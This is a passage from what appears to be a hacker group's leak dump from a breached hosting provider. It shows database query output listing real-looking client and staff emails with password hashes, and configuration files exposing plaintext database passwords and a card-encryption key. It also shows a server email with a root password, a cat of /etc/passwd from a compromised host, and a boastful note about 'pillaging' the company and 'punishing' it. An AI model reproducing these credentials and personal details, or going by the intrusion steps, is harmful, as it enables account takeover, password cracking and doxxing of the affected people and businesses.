  522. | brandon.harris@staminus.net | $2y$10$RBqtBNDwWCiVfgk9p4b5s.m5HJzkfd5Ra6yRaFSSgvTup/EjvGWTe | $2y$10$oxECgACyxuXwOil/aWzu4u4oHUhjbCOvEP0Q8EjQsUzoY3x5mG.Pm |
  523. | alexandra.yount@staminus.net | $2y$10$OSWfPL2Lla8L8a19PaFpc.2aHKa/k.sWXlE8EOisFjyaOAe79WXOe | $2y$10$T4t/ZGgxWY0EPX.eaZQk8.Fz8Gu4sLTxqwEFsDnikfrtisRv0SDi2 |
  524. | michael.marques@staminus.net | $2y$10$5yRlVQT5ZFjiV7fFusxZDOa6bDuISv7iARc1LTumaX8VKMuv.MTc2 | $2y$10$hTHfh..kJicqoUVcFYVW8.MdUHG8CpRGVZ1vKzau3vt.wDTXUiIIW |
  525. | support@staminus.net | $2y$10$YOzk6EZ/5fKdC1QPQzeLfuNRbtVzsEThDPWw40BJePi3QkL5MA7Qa | $2y$10$BwdWHPMg9h08hECSkqK2OORtqSMIfYrV61WgwFCtmHj9x7i7W6gIC |
  526. | support@staminus.net | $2y$10$0i050vZEy4KO2IXefkAHy.kpZHOCk54iPHg0BErvBAe9yYOEEAAle | $2y$10$hd/SWuEKoCLhHFkScSNv2.JCqMcOnnwbXjv7YbEgz5htTuoRlEQPK |
  527. | brian.frick@staminus.net | $2y$10$H05J1ge3UHAnNLMvQwmh0eNj5FsqyQAetcfsfxjAKbO6WDBtxmQ8a | $2y$10$ewzKhQMvI6/pxrzldTclz./yJc5GhJXwFsTgzlCeoPO.IzGGm6Hyy |
  528. | dane.tuso@staminus.net | $2y$10$prFM3sC9zegicIm4fnK.iuSdTu1fFCkruVo8F5j8CFhgAVTyyNblu | $2y$10$NueOFcDyMVyD9eLDDgMwuOLAGBDepTAmhUpdGjMCPuHKwcpRoeW1y |
  529. +------------------------------+--------------------------------------------------------------+--------------------------------------------------------------+
  530. mysql> select email,companyname,password from tblclients wgere status='Active';
  531. +---------------------------------------+---------------------------------------------------------+----------------------------------------+
  532. | email | companyname | password |
  533. +---------------------------------------+---------------------------------------------------------+----------------------------------------+
  534. | xtradgedy@gmail.com | Gladius | 99d17fe54c5e0d04d09d1854247ae7b1:RaCTY |
  535. | admin@ecocitycraft.com | EcoCityCraft | ce6ae8b26a7312a73d1b39b259413726:UpidZ |
  536. | lukas.schramm@me.com | | 4fa0db61093fd19095519dc700bbd15b:H#TGw |
  537. | dedrick@live.ca | Frenz | 63ec1208a4821647ac294ed73add5248:V#jdT |
  538. | brandon.harris@staminus.net | Staminus | 371bf12d9d5de8544135b2daa001a819:(MhY( |
  539. | admin@skyup.cc | ???? | 8e41274c6a5c680296f41bc1da890bda:!KP)f |
  540. | viktor.rovo@gmail.com | crafting solutions | 8bd1333f450c5858430df32a389e6a52:(VCX% |
  541. | masoud71@hotmail.com | | f77b91897b04791e9839d956296400a7:ZVEwU |
  542. | felipe@legendarynetwork.com | Legendary, LLC | b46ccad8391637cb9d0a33eb808beddd:VJ#S( |
  543. | sergbot@yahoo.com | | 6069d5d74c3382154294e6fc1ba2b67a:%RX!U |
  544. | jemaine.osia@gmail.com | RFWar Phillippines | ac570a9ce7c2b48335af813baa9d18c6:F%AJf |
  545. | mcassic@legendzero.com | Planet Minecraft | c12b4fbcb61d961d40cf2b153dbd45b1:%V#uE |
  546. | engie357@gmail.com | | 5dcae5f8bec5abaf7e095356595099d3:)%al# |
  547. | kylestatement@aim.com | One Peace | d80b1a742d4987587931d8c6af833eab:roqCG |
  548. | joehot200@gmail.com | Endcraft | 0b4a72a7755d6ef6e072d02f2807b4f7:)g(!y |
  549. | Zombiemold@Gmail.com | Vox Populi | 0a46f21c1641619840e645b087185e1f:GHjkT |
  550. | jisaacs1207@gmail.com | | 87cb8951b1a849fb368920056a3d980b:WR!Ee |
  551. | eviletho@gmail.com | | be7fbf063d708f7819c96ae403fd113a:!)cbJ |
  552. | mcminicorp@gmail.com | MVG | fb4cebe2bfd7b1a96e99a4c0f6e4fd7d:rMi(B |
  553. | mikemaz2005@gmail.com | No Excuse Gaming | 7986a3c739c44579c20343198e4dd881:%cxU) |
  554. | matthewgriffin80@gmail.com | BlackBox | d7bd7a6fcf0755a4830c15f611b7f78f:ZkI)z |
  555. | info@onzichtbaar.net | onzichtbaar | c47c7952a44d28f50d490bf7af30ed22:)FZzz |
  556. | tom_dean@ntlworld.com | | ea33882e1cce5426da4e90bfebbd5d49:hQoyK |
  557. | octagami@gmail.com | | 843b374d36f821f3124883cbbcfc04d8:uw!Tg |
  558. | jb@sixiron.net | Sixiron | f370e22c3703596ce72c0c8bd311b688:E%hGJ |
  559. | collin@minetime.com | Minetime, LLC | 80869eed0f6baaa6acf7403d9297b5ba:p!Gsw |
  560. | ryanxclancy@gmail.com | | 43ed33dbd038b3349924761d0adbac7d:PEUU# |
  561. | jacob@sadsoft.com | SADSOFT | 9fe7ab98e8051cfd97164e6860743c04:YZERW |
  562. | rafael.mathieu@live.com | | 2d623ba83a813b2d64ebe48de4a4431d:!%sWK |
  563. | dvasque4@gmail.com | DarCraft | fbd47f5b5ec133910c7d30546381d2df:#XdsK |
  564. | russell.ballard@hadronzoo.com | None | ecd93494590eef1119a010b31a45a039:uF!lD |
  565. | russell.ballard@voxsolaris.com | None | 32a191a52c2b238b27c5eb42f14c38cd:GKvFk |
  566. | 26815139@qq.com | Tai Hai Science Technology Co., Ltd. | 5ad6dbcd1f83a49581248843f2ba085b:dBHR) |
  567. | Jasowink@gmail.com | | 495cba88326d81aa4d0c4f6bb0a17a9a:!JXo! |
  568. | evandromasterrox@gmail.com | RadBR | 6204fee55665a59b9f7b47e4ec3345f2:TVgC) |
  569. | imfrom7thst@gmail.com | Bapcraft.com | ee4875f3e04b7c998d052805f7631828:ttE#) |
  570. | jiangcheng.mo@upai.com | | 179f4669131b35a785654136269c83ce:Lp)vE |
  571. | billing@gta-sarp.com | SARP | 76cdee00350584deb6cbc6d715e1f691:uPy#V |
  572. | partners@shinjiru.com | shinjiru technology | be50a52199b9579ef667e68662938861:Zr(D% |
  573. | hosting@maksa.in | ZamaHost | 3b11b0d0b9917a599fa2a9682d8d2525:%RUXI |
  574. | intlidc3@gmail.com | intlidc3 | c18a4f224133e5c2d8d82ee4b6ce6f50:(Imtz |
  575. | doteychen@gmail.com | www.it5.cn | 409e405f19527ed8a69684a466764103:%(phw |
  576. | seancraftxx@gmail.com | Axuber | bff8a0d7df8c788c3f25746d50b6788b:##kwj |
  577. | jason@fortressitx.com | FortressITX | fa79ad26fbc66ef43e58b6fd8f49c0ca:Vda%c |
  578. | bitame0423@gmail.com | A-maedical | 70ad9b82f363882fbb027905cf1cf6e9:ns%VM |
  579. | hakumatatala@hotmail.com | EBUYGOLD LTD | f5ad7275101762f1a5fb3d11a09fc2d0:iwMkE |
  580. | kirstenmarieriggs@gmail.com | Andromeda | 77cd9a416c7fc13713e05ae3e0e82878:!nQ)n |
  581. | aerogaming@ymail.com | aeRO Gaming Artificial Entertainment | 8806143fe6a72d84747de8452c33f95e:Nopfg |
  582. | nucleusae@yahoo.com | N/A | 324edf5355e6c69980b0b641bd185465:o%cBA |
  583. | jiashan.cui@gmail.com | | e1706a14cbb2446d6e3e325a5dbfbebc:%mIie |
  584. | tangjinsheng83@foxmail.com | china | c7d2cb2f1045cd992fde7f123ba04ea0:v%TXL |
  585. | josh@butterflylabs.com | BF Labs, INC | ac2583868921d3f52f6f47dfab6070a3:SuJG! |
  586. | serdar@o.kyan.us | OKYANUS BT. | e6e8a9faad5b23aaa64018ada93b9658:y(emC |
  587. | sales@hostpioneers.com | HostPioneers.com | 6330a06d1e63b8a8c1eaba20c2b3cb6d:Ll%Ij |
  588. | hengkhee@gmail.com | | 0f36508f97259ae8f8f2b0d5c7964076:hdTKd |
  589. | zpmehta@globalwavegroup.com | Global Wave Group | 639e09ea10b4589dc0998e303edac140:ssCG) |
  590. | holyapple84@gmail.com | | d2f5f9f3fc78dab65012b3b2e72de665:HnZKU |
  591. | office@cloudns.net | Cloud DNS Ltd, BG202743734 | af6a9a2a088280d42669c363d644f411:%#YZ% |
  592. | syed_ny@yahoo.com | | 861c2581a5062150f9676721a346c097:N!oOv |
  593. | info@jamimainternational.com | Jamima International Limited | 94f259244da8fe5be1ae6785a1a2ea98:)OCUv |
  594. | service@syntax10.com | Syntax10 Sdn Bhd | 70ce364f0f2eaf9581cdb1a0fbc20f06:wQMNS |
  595. | ryan.west@online.nl | | 1b5335bfd8eb3a08b0b9a962d56ab40d:!%mYc |
  596. | it@sverigedemokraterna.se | Sverigedemokraterna | a75ac2978496bae188fefe5764986bbe:WdzZW |
  597. | webmaster@sora.net | IDEE Consulting Inc | 1096cfc685365e5cdd4c7835597e134b:or#jA |
  598. | info@thetigerhost.com | The Tiger Tech | a60359b59a8033ae794f2d517687bcd2:n#AXR |
  599. | paypal@pknic.net.pk | PKNIC | 9a8bbe582ec75216418f567f8c6e8632:#)#rr |
  600. | alivanchin@gmail.com | RNSX | cb75e97e2d659208dd8ce67fb9128566:(%nhW |
  601. | sales@80000s.com | Netwoosun Network Limited | 0f77c3491dfe53d2a6a9c68dca336af6:AASEy |
  602. | cicnynjtv@gmail.com | CIC Productions | 3d0b0385543fad7f8d708bded60561cf:sDTLG |
  603. | jackflukinger@gmail.com | | 12344a18a05c6e777c80e0261edc015a:VC#)N |
  604. | yoohyosik@gmail.com | globalhost24 | 599108318cbb53c9bf4ec32aa96ce7f9:Hn!LE |
  605. | adminstaminus523@osbot.org | Meire and Brito Automation BV | 86415ea25fa91ee4aea6b9229b2a515b:DWOPQ |
  606. | albert.guo@transgloballimited.net | Bigcat Solutions Inc | 8c60bdba03f15341bd67914ae0733662:Nv##n |
  607. | stoli.arreola@gmail.com | | 16086bcbe8723d97f75cd5a1eab3d846:G)Hjh |
  608. | ruslan@unlogic.az | Unlogic | 516f5d93f33f9e03a4da78635768599b:B!%)K |
  609. | emps.ps.co@gmail.com | Emps-World | d40b0fa8515eb51c4cc77b23eacf78b0:IW%Vd |
  610. | support@virwox.com | Virtual World Services GmbH | 659c3f721209485c8d6815a13bf164b7:JU)mQ |
  611. | david@firezetta.com | Uptrend Network Sdn Bhd | 033258b7da48fb760ab3681aca791997:V)nnO |
  612. | casswong@paradigm4u.com | GLOBE FIRST INTERNATIONAL SDN BHD | e5629d05a1bbe57d9827fa4c9500ee28:%bx#a |
  613. | thegamenutter@gmail.com | | 4a6f9dc1f0ac7a28ced3e10ba40544a5:!A(jP |
  614. | ontiverosabel@gmail.com | velocity | 7a04f63e34694bcaa1e916e5cba142f4:(e)Kg |
  615. | valantismc@yahoo.com | Avalon-Servers | 6ff13773c875e839f494f287bc5e94ca:XIs(t |
  616. | xiaoxiaolongyun@gmail.com | sailianidc | 3e384fd811454b5d73b4c448d54be109:!%oaf |
  617. | opsmgr@brightedge.com | BrightEdge Technologies | c00e00bad69dea0f58a2bf134e911d40:)ezRV |
  618. | marcodeboer92@gmail.com | Minevival | b9a560574f824738aadc64d49f94213c:Gt(tm |
  619. | info@novende.com | Sirket | d1102d8b8a2170321441e48fce538c15:GITCl |
  620. | byflutter@hotmail.com | | dcf1ca89d37aa01169eeb04924bfdd68:zpQjo |
  621. | cntrl@thetechsolgroup.com | Tech Solutions Group | 5d1bd4160ed34e16f78a7746f8e31d4d:)QXWa |
  622. | gaddo1977@gmail.com | | 6e68159ebd95db9cae03c2f061c1175f:vhoao |
  623. | ryacine@gmail.com | | 3db5b0ab499c733858e0ed915fea7758:#ECIe |
  624. | eureca@vlan24.com | Vlan24 | a2f596393e650061e745213269ba3044:)Wlvn |
  625. | eonekim@gmail.com | | da9826e6520fde2e863c9912d49eb8cc:gUAbE |
  626. | ggreen@myntex.ca | Myntex Inc. | abd912336c85b934d5eb0292bcf559c6:fmkuQ |
  627. | noajkarim@neomailbox.ch | | a6406072bf80f06091a191cb770b2d8e:(#XQX |
  628. | visionnet.tv@hotmail.com | visionnet | 5b3065bf83124e64ede85218c9339ba4:u%Wav |
  629. | hack_xx1@hotmail.com | Grinderscape | f3e543aaef3f081fab0b6fee940840fd:M!lsm |
  630. | mvdhauw@home.nl | | 8acceaa94cf65aa4b6a0f03dff5ac4f7:hijI# |
  631. | zamtalk@hotmail.com | zamtalk communication LTD | c2bd63be1834f9dea8380c9127548d58:LoA(W |
  632. | marco@duratech.ca | duratech | 57d4f9a9923afcac69c8f88d2860cc78:)%WFp |
  633. | dan@laveria.com | Plexus Node | 5333ed92129a51160afa1ae556d3367e:Yj!gJ |
  634. | muelas44@hotmail.com | IST | c8fce617571f7e00258145137f6ac8de:yGeXe |
  635. | bill@theabovenetwork.com | The Above Network | 58b0c63c13b3bdaf78d358d2fee91641:Jxw!p |
  636. | tnt996@miccraft.com | Miccraft | c5d88c7fea8680a60cd47504d1b11fb9:Uryo# |
  637. | matt@hivemc.com | The Hive Network LTD | d983718c26d5ecd256b6bd935a645256:yUcnC |
  638. | teamvass@gmail.com | | 2b99a12cafcb4cc63c6ffb84d9173e84:Y!gn% |
  639. | donationbuycraft@gmail.com | HexicNetwork | efcf163be52aaf3d7dd2c26130dd0346:CfVmd |
  640. | insintigo3@gmail.com | Insintigo | a3f0ae991188fee7fbb0463b2236d617:XDLeu |
  641. | jdog250358@live.com | Unrivaled Gods | 3b7d1bb5ff12676b46a47ac728a396ae:VfOn% |
  642. | xdavijonesx@gmail.com | | 266f2474cd770008aea5221e5c8c6d8f:(U#)h |
  643. | bridgeone24@gmail.com | BRIDGE ONE LIMITED | 26e2482f6972655a591a514ae7e3abd6:MRHqe |
  644. | hguild13@icloud.com | | 5459b9c247d50aba2aea99e35138cf6f:h%(G( |
  645. | nikolaos.vassos@gmail.com | Juiceboxd | 0215ff83c31bf771adfc55208060c365:MyrVT |
  646. | paddy.lamont@student.scotch.wa.edu.au | Tundlor | 2bfa425ff46feb5931087d37ee9e9c59:Mzj#L |
  647. | khw@ngdc.kr | NGDC Corp | 58fd32e88fe6f0e883291a86c427adde:Gw)Sc |
  648. | jeffryempara@ymail.com | | 4552cc6ac423183a18abb7f2775d1165:#Uwc) |
  649. | hawycastillo970@yahoo.com | | 003799ebe0c0e13b3bcb1d4b590e852c:)xwwH |
  650. | antihelp@gmail.com | | 09d722b959ddf16a1aaeb5537d545ca5:RT#(n |
  651. | daniel.story@gmail.com | | dd95f63ff81c27798f81edfb6a0ed485:io##B |
  652. | countvidal@gmail.com | | 3d2cadb1378fc4ceb72a935c45f6996e:wUIJo |
  653. | yellowbero@gmail.com | 3brosoft | d6d4ecb114061f2ed48a3c0043c475a7:#EQy( |
  654. | streamerhouse@gmail.com | StreamerHouse | e73818a9c2e88f5ea377414d8720b0ae:Wz(Hu |
  655. | skegalogical@gmail.com | Cubic Technological Services | beca04415cc5b02cc2878b5ad251e653:l!dvs |
  656. | reprisalrsps@gmail.com | ReprisalGaming | 75cc99ab6c42539ba294ec04bd271215:MzA!i |
  657. | 44267797@qq.com | xuntian | 4941e8b0191991e89cf19f29a76c7e94:(z%B( |
  658. | sergio.mestre@gmail.com | | be850b34a714e75dcd7edd09664cc259:ga%)d |
  659. | travisaarmstrong@gmail.com | ServoNetwork | 68bed8c6609e58ba8d577c166425644e:whrHr |
  660. | dhany_permana@yahoo.com | MPF | 1c42dd56214e504bdd1da73eae3bb764:lH%uB |
  661. | jordanbmail@gmail.com | Anathema | 4d83d7c32bf7beb76629ad5d4830a28f:)S!bV |
  662. | folkert_jerry@hotmail.com | Life Studios | 9c7c572bebc3441ef50327238d74bfd0:y#%PA |
  663. | maplelegends62@gmail.com | MapleLegends | 533a1b6f33a54917ff8389b53aee9e37:HiUji |
  664. | dylan@blockedup.net | BlockedUp | 13d0c6cd72592294bdfaac4309a84dc0:Bh)SF |
  665. | victoriawatkins22@gmail.com | | f8ee84e35f2a32a9decf64a559517ba9:(DH(( |
  666. | jeff.toto@yandex.com | | 50dfd82e997f24cb51923ecc65d88963:btfs% |
  667. | support@megaidc.net | | 25bf8861aa59ab7687b75b3ad6f5ee54:)u#nx |
  668. | nathanaelhellsten@gmail.com | | c6e91f94e2c6895a7baf4b04c7933291:i!)#W |
  669. | business@letswin.cn | Guangzhou YuanYue Computer Network Technology Co., Ltd. | 41ba387f30f61a39ba7bb1e622eea913:)rLub |
  670. | Getrdonecountry@gmail.com | | 554a0409eb0e9938b6b57edd41a893d3:Cs!Op |
  671. | purchasing@haicorptech.com | haicorp technology sdn bhd | 3657537a6c46b592765346c5dd3747b7:)RMEd |
  672. | scorpious2k@gmail.com | | 6597e4a6bfb7ffba5a3473e60f4bad3a:XXl#! |
  673. | internetcache1@gmail.com | | f81c5b2dbf2bcfde263ffe8e28890dc2:#t!I# |
  674. | andirew.karate@gmail.com | | 8fa8f7e7bdab9ba2eb0f2b0018f5891d:#%YMg |
  675. | snail@snailz.net | | f6d394fd4e2a66b6fc570cc122039896:LJ%N( |
  676. | talleurw@gmail.com | Prodigy-X | 409ab12298f7425cb50a09392351c0fc:PG)WH |
  677. | craftimize@voldex.net | NPEntertainment,LLC | a6521a57a55babb840672d8747505de4:XMgDo |
  678. | orbed.box@gmail.com | OrbedBox | 71a10c33113d247ab6021453ee87fd82:ex%l( |
  679. | dazed_jj138@yahoo.com | | 32dce3e6c798f4544dfab0339ae7958d:!D(uT |
  680. | duttson.dj@gmail.com | dutt yo | 47f852645a8c9af937fce7f84b0280be:DLizF |
  681. | daniel_carbonari@yahoo.com.ar | L2Tsurugi | a3edb21d6cfbbadca3674a812f1ea78a:o#Q%J |
  682. | rezzphil@gmail.com | Hypixel inx | 7abf1a9484f6d966caa14a7f08447eab:OD(f) |
  683. | a.j.whitcombe@icloud.com | Abyssal Networks | 383802c28937c63eda0c69dda1053439:B)K!# |
  684. | arkile@gmail.com | 907 Gamers | 87992aba39bd0bcc4ca317d3062b0de3:%ecB! |
  685. | emi_oconnor@hotmail.com | Argentina MU | 1c0081d60812a1f58fcddebbc3902885:%mqb# |
  686. | mrgamer87@gmail.com | SupWebs | e03db4cd931678118cfbd2a7dfc7ffe1:(e!%# |
  687. | pay@megaidc.net | | 8d3504901b76c2e949abd031df653ea5:ZwpdX |
  688. | alexis.wiiuu@gmail.com | | ead99cb7de4b60391fbfe166ab22609d:zZO(P |
  689. | primetimegamingts@gmail.com | Primetime Gaming | f71c27e9b27d063d1e0c8cdb528c498d:O)pK) |
  690. | admin@battlecraft.us | BattleCraft Minecraft Servers | 713ab62eab5db15cb1d198fb8f14d0af:PBYLM |
  691. | reyadhnagi@gmail.com | | 533c6b022822ec902fcf371ba4d87a5a:MSa!# |
  692. | jh_cn@139.com | bmchat | d735619e8a8bb47325f607e94067e20e:RXdJZ |
  693. | xmatth13@live.com | | 9ade5f23ac9be616ea2b6074bca390eb:GCfZj |
  694. | nihadm89@hotmail.com | Woon Gaming | 1d578bc6501257ae1e71a37e5cadf450:McJjr |
  695. | webmastersteve@comcast.net | | e966e0c3d5c9fcb01770db46d973610a:nQ(up |
  696. | miguel_carrilloa@empress.com.mx | Aplicaciones y Servicios de Información Empress, S.C. | b737c0ec28c5e31da5283c3220a57fc3:)T)MX |
  697. | zkackary57@gmail.com | | 0e0e461485ba57c32e80f925ff0511a7:LKfYJ |
  698. | admin@filecreator.biz | File Creator LTD | 13aba3cbc7242892cb1db17b591c1bea:lLt%( |
  699. | paypvt@gmail.com | None | cebdfe2cd5afdb7f81b2457997aa5143:b)M)t |
  700. | chrisandthemike@gmail.com | | a023b26248e52f676d26cd604216a664:wVjTb |
  701. | superfrank@codetel.net.do | RadioYmedio, networks | 77ff66383fe154b260d9f0a68b188f48:JE(%( |
  702. | uckun@compilex.com | Compilex LLC | 0213360bf24400007d80dcfb61e3bb30:oOh(u |
  703. | dontaa@onlineindustries.net | onlineindustries | e535140ab86cf87ea9429107d2887ae9:H!)I) |
  704. | dovnar@gmail.com | | 60cb074e907ee5613169e2097d6caa69:Wd!Vs |
  705. | pw@lowbake.com | | 3465c2268f6a910b41e86bec5ac61999:oP!)) |
  706. | timelesspvpmc@yahoo.com | Timeless PvP | d04647480387ad66dff9f7b277fe7599:)RPd# |
  707. | chris_smith96@hotmail.com | | 160f4160bda02ac662b47d441dea72ef:YCMn# |
  708. | yobuddyitsjosh@gmail.com | 420 pkersss | c6137ce37b7b7e7f928c0792ed872446:dl#Wb |
  709. | mike_zihal@hotmail.com | MMOBAY LLC | 1c400aa226f6e386122bb3970df17526:WMKfh |
  710. | swagsterrory@Gmail.com | We Are Legion | 67cda8378bdf1685f0767499a5fb7eb7:)grqJ |
  711. | support@chromediamondmc.com | | 34b68fb2a89a0dab1102d18ac234adb6:V#wmt |
  712. | deonis78@gmail.com | VDA LLC. | eb4384355ba8277e7615d05e66fd1016:BcJk) |
  713. | iamgretara@gmail.com | appstarme ehf | bef800b54443cbd45417e865ae429513:KkUzb |
  714. | rachelmpendergraft@gmail.com | American Heritage Committee | 32a657ba0ebfc57b067c9f67880f5faa:FPz!T |
  715. | accountsbrs@quantumit.com.au | Bankroll Studios | 74aec77c514794506683d7b6fb2d3cc9:fOH)I |
  716. | zenoscape@hotmail.com | ZenoScape | 4e59e2475b516366259b0e27ef4ad4ff:yZ!sm |
  717. | arrondawson55@gmail.com | EmulousHCF | beef13cce41aae05455e3c8de37aa868:F)N#! |
  718. | shadikurbd@gmail.com | Jafko Telecom | 64df286033bbc3df9cac5408b2e6cb42:(ZgT# |
  719. | azanku19@gmail.com | Draconia | 2fdb713e53dc1e4f0348863949659912:HWAQc |
  720. | 71Kevin17@gmail.com | | df37ffb83cfac004188f292394901631:(ZKx% |
  721. | daniel4d@gmail.com | | c24b22fd3fa75130ea4b5053a7703361:xsNT! |
  722. | hamilton.w@live.com | Levelhosting Inc. | 1d20b5cc642e94b65d8204a66d8f9797:bvY%t |
  723. | gffwffiffzffg@gmail.com | | f69d00950bdac61043d0b49f8ea6c3c5:shILb |
  724. | perin_2020@hotmail.com | peri | e2d121ea25974f3fef07b488da7a0f47:KmhNC |
  725. | servers@low-key.us | Low-Key Gaming | 4b2f6c240c1043ffa1287c4130d2929f:)qbvT |
  726. | Mrdeweytv@gmail.com | | 6d9159285d713646e20c41a80d48363c:j(!)Q |
  727. | services@expressvpn.com | ExpressVPN | 23c6e3a0142b1aae97aecfec297ce041:N)Ljt |
  728. | zoom3rlol@gmail.com | cs | 27b79a4077dd6056f5c293f818e7b26d:BzVUz |
  729. | michaelmcevoy33@gmail.com | Masonicz | cb79f1a4e1cee7c3ece41eca96cc7b7c:aw!nH |
  730. | me@togglinq.io | None | f8193e381e1034998cc0faa41649a4af:R%qVk |
  731. | thekingkillershow@yahoo.com | | 53aabbcd626cdde47afa34f0889eee05:PBw#n |
  732. | sozdar_2001@yahoo.com | | fd492ff587ba19eb32df9c0987adf575:IcnhM |
  733. | SlimTheReaper@gmail.com | N/A | 87db05e67f8656005c3c6000629e3639:PWiWl |
  734. | calist3@care2.com | GooseGames LLC | 08ff123ed00d1e248bc2e57847ba6ae5:NGOsp |
  735. | corporate@digitalleisure.com | Digital Leisure Inc. | 63ef3d0c887fcaf4cf5d2362faa880b2:NOa#T |
  736. | mcwarside@hotmail.com | MCWarside | edd197233e25ebb176ecda83aac51801:GQ#M( |
  737. | sean@rapideagle.com | VoIP Essential Inc. | cc5bb09bb79934fd5bd95b74ecb136d9:))MTW |
  738. | mailer.caster@gmail.com | Caster.fm | f800a5155e6ca08b1fcb1732a3ae924e:b#%Gp |
  739. +---------------------------------------+---------------------------------------------------------+----------------------------------------+
  740. cat www/html/wp-config.php
  741. :: SNIP ::
  742. /** MySQL database username */
  743. define('DB_USER', 'Intrepid');
  744.  
  745. /** MySQL database password */
  746. define('DB_PASSWORD', '23R0c001!');
  747.  
  748. /** MySQL hostname */
  749. define('DB_HOST', 'localhost');
  750. :: SNIP ::
  751. cat www/html/whmcs/configuration.php
  752. :: SNIP ::
  753. $license = 'Leased-4ffa9003ed22baf252dd';
  754. $db_host = 'localhost';
  755. $db_username = 'whmcs';
  756. $db_password = '23R0c001!';
  757. $db_name = 'whmcs';
  758. $cc_encryption_hash = 'juTOtwLMViqpbQHxihu4vm00scaIg9spuc3NzFqkOHAPn8cwfxqBJgr2jsApsTFM';
  759. $templates_compiledir = 'templates_c/';
  760. $mysql_charset = 'utf8';
  761. date_default_timezone_set('America/Los_Angeles');
  762. :: SNIP ::
  763.  
  764.  
  765. ██╗ ██╗██╗ ██╗██╗ ██╗ ██╗ ███████╗██████╗ ██╗███████╗███╗ ██╗██████╗ ███████╗
  766. ██║ ██╔╝██║ ██╔╝██║ ██╔╝ ██║ ██╔════╝██╔══██╗██║██╔════╝████╗ ██║██╔══██╗██╔════╝
  767. █████╔╝ █████╔╝ █████╔╝ ████████╗ █████╗ ██████╔╝██║█████╗ ██╔██╗ ██║██║ ██║███████╗
  768. ██╔═██╗ ██╔═██╗ ██╔═██╗ ██╔═██╔═╝ ██╔══╝ ██╔══██╗██║██╔══╝ ██║╚██╗██║██║ ██║╚════██║
  769. ██║ ██╗██║ ██╗██║ ██╗ ██████║ ██║ ██║ ██║██║███████╗██║ ╚████║██████╔╝███████║
  770. ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚���╝ ╚═╝╚═╝╚══════╝╚═╝ ╚═══╝╚═════╝ ╚══════╝
  771.  
  772. ~[CTRL-H]~ KKK & FRIENDS
  773. This was a real treat and one that completely blindsided our team. After pillaging and generally shitting on
  774. the entirety of Staminus' & co's infrastructure, it was discovered that one of the client box's was housing a real gem.
  775. Yes, that's right, Staminus was hosting the KKK and it's affiliates. An organization legally recognized in some regions
  776. as a terrorist collective. Not that we hold anything against the KKK. Choosing such an awful host as Staminus however is
  777. unforgiveable, and consequently they had to be punished.
  778.  
  779. :: SNIP ::
  780. Hello Rachel Pendergraft,
  781.  
  782. Your server is complete.
  783.  
  784. Here is your server information:
  785.  
  786. Administrative IP: 69.197.2.214 (Private Use)
  787. Protected IP: 69.197.31.193 (Public Use)
  788. User: root
  789. Password: TkBNk7TdrSh2Uq42
  790. Secondary Usable IP's: 69.197.31.193 - 69.197.31.206
  791.  
  792. Please remember to not give out your Administrative IP [69.197.2.214]. Only use your Protected IP [69.197.31.193] for public serving services.
  793.  
  794. Your protected IP is protected for 30 Gbps or 12 Million Packet Per Second which ever it reaches first. If your attack goes above either one
  795. of those your protected IP will be nullrouted for the duration of the attack. If you wish to upgrade at that time
  796. please submit a sales ticket requesting a quote.
  797.  
  798. Your can reach your cPanel at https://69.197.2.214:2087
  799.  
  800. If you have any further questions please do not hesitate to ask us.
  801.  
  802. Thank you
  803.  
  804.  
  805. ---
  806. Thank You
  807. Intreppid Support |
  808. :: SNIP ::
  809.  
  810. ( ?° ?? ?°)
  811.  
  812. :: SNIP ::
  813. Please set the following rDNS pointers:
  814.  
  815. 69.197.2.214 sv1.harrisonarkansaswebsites.com
  816. 69.197.31.193 kkk.bz
  817. 69.197.31.198 wpmedianetwork.com
  818. 69.197.31.199 kkk.com
  819. 69.197.31.200 kkkradio.com
  820. 69.197.31.201 americanheritagecommittee.com
  821. 69.197.31.205 sotctraininginstitute.com
  822. 69.197.31.206 sotctv.com
  823.  
  824.  
  825. Thank you
  826.  
  827. ----------------------------
  828. IP Address: 72.204.92.252 |
  829. :: SNIP ::
  830.  
  831. root@sv1 [~]# cat /etc/passwd
  832. root:x:0:0:root:/root:/bin/bash
  833. bin:x:1:1:bin:/bin:/sbin/nologin
  834. daemon:x:2:2:daemon:/sbin:/sbin/nologin
  835. adm:x:3:4:adm:/var/adm:/sbin/nologin
  836. lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  837. sync:x:5:0:sync:/sbin:/bin/sync
  838. shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  839. halt:x:7:0:halt:/sbin:/sbin/halt
  840. mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  841. uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  842. operator:x:11:0:operator:/root:/sbin/nologin
  843. games:x:12:100:games:/usr/games:/sbin/nologin
  844. gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  845. ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  846. nobody:x:99:99:Nobody:/:/sbin/nologin
  847. dbus:x:81:81:System message bus:/:/sbin/nologin
  848. vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  849. rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
  850. abrt:x:173:173::/etc/abrt:/sbin/nologin
  851. rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
  852. nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
  853. haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
  854. ntp:x:38:38::/etc/ntp:/sbin/nologin
  855. saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  856. postfix:x:89:89::/var/spool/postfix:/sbin/nologin
  857. sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  858. tcpdump:x:72:72::/:/sbin/nologin
  859. oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
  860. nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
  861. named:x:25:25:Named:/var/named:/sbin/nologin
  862. mailnull:x:47:47:Exim:/var/spool/mqueue:/bin/false
  863. mysql:x:498:497:MySQL server:/var/lib/mysql:/bin/bash
  864. dovecot:x:97:97:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
  865. dovenull:x:497:496:Dovecot's unauthorized user:/usr/libexec/dovecot:/sbin/nologin
